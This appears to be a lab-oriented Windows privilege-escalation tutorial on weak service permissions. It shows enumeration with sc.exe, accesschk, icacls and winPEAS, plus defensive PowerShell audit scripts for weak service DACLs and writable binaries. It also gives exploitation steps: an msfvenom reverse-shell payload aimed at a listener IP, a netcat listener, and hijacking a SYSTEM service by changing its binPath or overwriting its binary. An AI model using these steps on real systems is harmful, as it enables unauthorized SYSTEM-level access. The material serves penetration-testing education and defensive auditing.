
# 7 - Weak Service Permissions

#### Topics

> 1. Introduction to the Windows Shells
> 2. Windows Permissions
> 3. Reverse Shells in Windows
> 4. SeImpersonatePrivilege Exploitation
> 5. On Cross Compilation
> 6. Windows Services
> 7. Weak Service Permissions
> 8. Unquoted Service Path
> 9. DLL Hijacking
> 10. Always Install Elevated
> 11. Files with Sensitive Data
> 12. Windows Hashes
> 13. Stored Credentials and the Windows Vault
> 14. Scheduled Task
> 15. Critical Registry Paths
> 16. Useful Tools
> 17. AMSI Bypass

## **Weak Permissions on Service Configuration**

Weak service configurations and binaries present significant security risks: a service's configuration can be altered by any user or group that has sufficient permissions on it.

**Viewing Service Configuration**

[simpleService.c](https://github.com/LeonardoE95/yt-en/blob/main/src/2024-10-27-windows-privesc-windows-services/content/simpleService.c)

Use the `sc.exe` command to check a service's configuration:

```powershell
sc.exe qc SimpleService
```

**Sample Output:**

```plaintext
SERVICE_NAME: SimpleService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\Quickemu\Downloads\simpleService.exe
        SERVICE_START_NAME : LocalSystem
```

**Checking Permissions with AccessChk**

[AccessChk](https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk) is a Microsoft utility that shows what kind of access specific users or groups have to resources including files, directories, Registry keys, global objects and Windows services. AccessChk quickly answers these questions with an intuitive interface and output. (Download it from [here](https://download.sysinternals.com/files/AccessChk.zip))

Then, using `accesschk64`, we can verify permissions over a service:

```powershell
.\accesschk64.exe /accepteula -uwcqv SimpleService
```

**Sample Output:**

```plaintext
SimpleService
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
```

The output lists the access each user or group has to the service. `SERVICE_ALL_ACCESS` means full control over the service, held here by `NT AUTHORITY\SYSTEM` and `BUILTIN\Administrators`.

After checking the configuration, the goal is to change the binary path so that it points to the malicious executable, then stop the service and start it again.

**Exploitation Steps**

1. **Create a Malicious Executable**\
   Generate a reverse shell payload:

   ```bash
   msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe
   ```
2. **Modify the Service Executable Path**\
   Change the `binpath` to point to the malicious binary:

   ```powershell
   sc.exe config SimpleService binpath="C:\Users\Quickemu\Downloads\malicious.exe"
   ```
3. Start a netcat listener on the Linux attacker machine (the connection arrives after the next step):

   ```bash
   nc -lvnp 7777
   ```
4. **Restart the Service**\
   Restart the service to execute the malicious binary:

   ```powershell
   sc.exe stop SimpleService
   sc.exe start SimpleService
   ```
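
From the defender's side, the AccessChk check above can be run across every service to find principals other than SYSTEM and Administrators that are able to reconfigure one. The script below is an added example, not part of the original page; the function name `Get-WeakServiceAce`, the trusted-SID list and the sample SDDL string are assumptions made for illustration.

```powershell
# Added example: audit service DACLs for low-privileged principals that can
# reconfigure a service. Read-only; run elevated so every service can be queried.

# Access-mask bits that allow changing binPath or rewriting the service DACL
$Dangerous = [ordered]@{
    'SERVICE_CHANGE_CONFIG' = 0x00002
    'WRITE_DAC'             = 0x40000
    'WRITE_OWNER'           = 0x80000
    'GENERIC_WRITE'         = 0x40000000
    'GENERIC_ALL'           = 0x10000000
}
# Principals expected to hold full control: SYSTEM, Administrators, TrustedInstaller
$Trusted = @(
    'S-1-5-18',
    'S-1-5-32-544',
    'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'
)

function Get-WeakServiceAce {
    param([string]$ServiceName, [string]$Sddl)
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $Sddl
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace.AceType -ne 'AccessAllowed') { continue }
        $sid = $ace.SecurityIdentifier.Value
        if ($Trusted -contains $sid) { continue }
        # Names of every dangerous right present in this ACE's access mask
        $hits = $Dangerous.Keys | Where-Object { $ace.AccessMask -band $Dangerous[$_] }
        if ($hits) {
            [pscustomobject]@{ Service = $ServiceName; Sid = $sid; Rights = $hits -join ',' }
        }
    }
}

# Constructed sample: Authenticated Users (AU) hold DC = SERVICE_CHANGE_CONFIG
$sample = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPLOCRRC;;;AU)'
Get-WeakServiceAce -ServiceName 'SampleService' -Sddl $sample

# Live audit: sc.exe sdshow prints the SDDL of each service's security descriptor
foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $sddl = ((sc.exe sdshow $svc.Name) -join '').Trim()
    # Skip sc.exe error output (for example access denied), which is not SDDL
    if ($sddl -like 'D:*') { Get-WeakServiceAce -ServiceName $svc.Name -Sddl $sddl }
}
```

Each row names a principal that can change that service's configuration or DACL; after reviewing the full SDDL, the right can be removed with `sc.exe sdset`.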

***

## **Weak Permissions on Service Binary**

If the service binary itself has weak file permissions, it can be overwritten with a malicious executable.

**Identifying Service Binaries**

List the binary paths of running services:

```powershell
Get-CimInstance -ClassName win32_service | Select Name, State, PathName | Where-Object {$_.State -like 'Running'}
```

**Checking Binary Permissions with ICACLS**

Use the `icacls` utility to view file permissions:

```powershell
icacls .\simpleService.exe
```

**Sample Output:**

```plaintext
.\simpleService.exe NT AUTHORITY\SYSTEM:(F)
                    BUILTIN\Administrators:(F)
                    QUICKEM-5QLQQP9\Quickemu:(F)
```

If the current user has "Full Control" (`(F)`), they can overwrite the binary.

**Exploitation Steps**

1. **Generate and Transfer a Malicious Binary**

   ```bash
   msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe
   ```
2. **Backup and Replace the Service Binary**

   ```powershell
   cp .\simpleService.exe .\simpleService.exe.bkp
   cp .\malicious.exe .\simpleService.exe
   ```
3. Start a netcat listener on the Linux attacker machine (the connection arrives after the next step):

   ```bash
   nc -lvnp 7777
   ```

4. **Restart the Service**

   ```powershell
   sc.exe stop SimpleService
   sc.exe start SimpleService
   ```
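
The `Get-CimInstance` listing and the `icacls` check above can be combined into one audit that reports every service binary writable by a principal other than SYSTEM, Administrators or TrustedInstaller. This is an added example, not part of the original page; the function names `Get-ServiceExePath` and `Get-WritableServiceBinary` and the trusted-SID list are assumptions made for illustration.

```powershell
# Added example: find service binaries that non-administrative principals can
# overwrite or re-permission. Read-only.

$Trusted = @(
    'S-1-5-18', 'S-1-5-32-544',
    'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'
)
# File rights that allow replacing the binary or changing its ACL,
# plus the GENERIC_WRITE and GENERIC_ALL bits (0x50000000)
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership' -bor 0x50000000

function Get-ServiceExePath {
    param([string]$PathName)
    # PathName may be quoted and may carry arguments after the executable
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)(\s|$)') { return $Matches[1] }
    return $null
}

function Get-WritableServiceBinary {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $exe = Get-ServiceExePath -PathName $svc.PathName
        if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { continue }
        $acl = Get-Acl -LiteralPath $exe -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        # Resolve identities as SIDs so the comparison is independent of locale
        $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
        foreach ($rule in $rules) {
            if ($rule.AccessControlType -ne 'Allow') { continue }
            if ($Trusted -contains $rule.IdentityReference.Value) { continue }
            if (([int]$rule.FileSystemRights -band $WriteMask) -eq 0) { continue }
            [pscustomobject]@{
                Service = $svc.Name
                RunsAs  = $svc.StartName
                Binary  = $exe
                Sid     = $rule.IdentityReference.Value
                Rights  = $rule.FileSystemRights
            }
        }
    }
}

Get-WritableServiceBinary | Format-Table -AutoSize
```

A row whose `RunsAs` is `LocalSystem` corresponds to the case shown in the `icacls` sample output, where a standard user holds `(F)` on the binary of a service that runs as SYSTEM.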

***

## **Service Enumeration with winPEAS**

`winPEAS` is a tool used to enumerate potential misconfigurations, including weak service permissions.

**Downloading winPEAS**

Download the binary:

```bash
wget https://github.com/peass-ng/PEASS-ng/releases/download/20241011-2e37ba11/winPEASx64.exe
```

**Running winPEAS to Enumerate Services**

Use the `servicesinfo` option to gather information about services:

```powershell
.\winPEASx64.exe quiet servicesinfo
```

`winPEAS` will display information about services, including configuration details, permissions, and potential vulnerabilities.

## Other Resources

* Windows Privilege Escalation Awesome Scripts: [https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS)
* Weak Service Permissions: [https://www.ired.team/offensive-security/privilege-escalation/weak-service-permissions](https://www.ired.team/offensive-security/privilege-escalation/weak-service-permissions)
* Windows local privilege escalation: [https://xorond.com/posts/2021/04/windows-local-privilege-escalation/](https://xorond.com/posts/2021/04/windows-local-privilege-escalation/)
* Service Misconfiguration: [https://www.narycyber.com/posts/privilege-escalation/windows/service-misconfigurations/](https://www.narycyber.com/posts/privilege-escalation/windows/service-misconfigurations/)
* Weak Service Permissions: [https://juggernaut-sec.com/weak-service-permissions-windows-privilege-escalation/](https://juggernaut-sec.com/weak-service-permissions-windows-privilege-escalation/)
* Insecure Service Permissions: [https://akimbocore.com/article/privilege-escalation-insecure-service-permissions/](https://akimbocore.com/article/privilege-escalation-insecure-service-permissions/)

{% hint style="danger" %}
**Disclaimer**

**❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!**❗
{% endhint %}

